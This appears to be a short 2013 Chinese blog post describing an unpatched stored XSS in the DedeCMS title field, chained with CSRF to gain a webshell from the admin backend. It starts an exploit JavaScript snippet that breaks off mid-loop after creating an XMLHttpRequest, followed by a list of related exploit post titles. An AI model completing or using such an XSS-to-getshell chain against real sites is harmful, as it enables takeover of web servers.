dedecms利用xss+csrf getshell

发表于 2013年06月05日
Vulndb

dedecms的漏洞很多,但是厂商都是不做修复。
之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。

后台可触发xss，利用js代码：

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i

标签：Dedecms漏洞原文连接：dedecms利用xss+csrf getshell 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

昆明打字复印需要实名登记官方禁售白色T恤衫天蝎座Web安全渗透测试工具集V5发布

Dede后台getshell【过20130715】

Dede后台getshell【过20130715】

织梦DEDECMS search.php注入漏洞EXP[通杀]

织梦DEDECMS search.php注入漏洞EXP[通杀]

DedeCms SQL注射漏洞再利用

DedeCms SQL注射漏洞再利用

织梦cms v6.7最新上传漏洞

织梦cms v6.7最新上传漏洞

DEDECMS XSS GETSHeLL 通杀所有版本

DEDECMS XSS GETSHeLL 通杀所有版本

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

ThinkPHP3.x注入漏洞

ThinkPHP3.x注入漏洞

Weblogic一键漏洞扫描检测工具：WeblogicScan

Weblogic一键漏洞扫描检测工具：WeblogicScan

两个生成式AI 平台推荐，生产力亲测

两个生成式AI 平台推荐，生产力亲测

如何知道移动应用程序是否是使用 Flutter 制作的？

如何知道移动应用程序是否是使用 Flutter 制作的？

禁用WordPress 6.7 中延迟加载图像的自动调整大小

禁用WordPress 6.7 中延迟加载图像的自动调整大小

王慧文清华产品课

王慧文清华产品课

Mos macOS下平滑鼠标滚动/滚动方向小工具

Mos macOS下平滑鼠标滚动/滚动方向小工具

Flutter 中设置 Google Maps 样式深色模式

Flutter 中设置 Google Maps 样式深色模式

解决WordPress上传svg/ico/webp，您无权上传此文件类型

解决WordPress上传svg/ico/webp，您无权上传此文件类型

cursor, 一款基于 vscode 的 AI IDE

cursor, 一款基于 vscode 的 AI IDE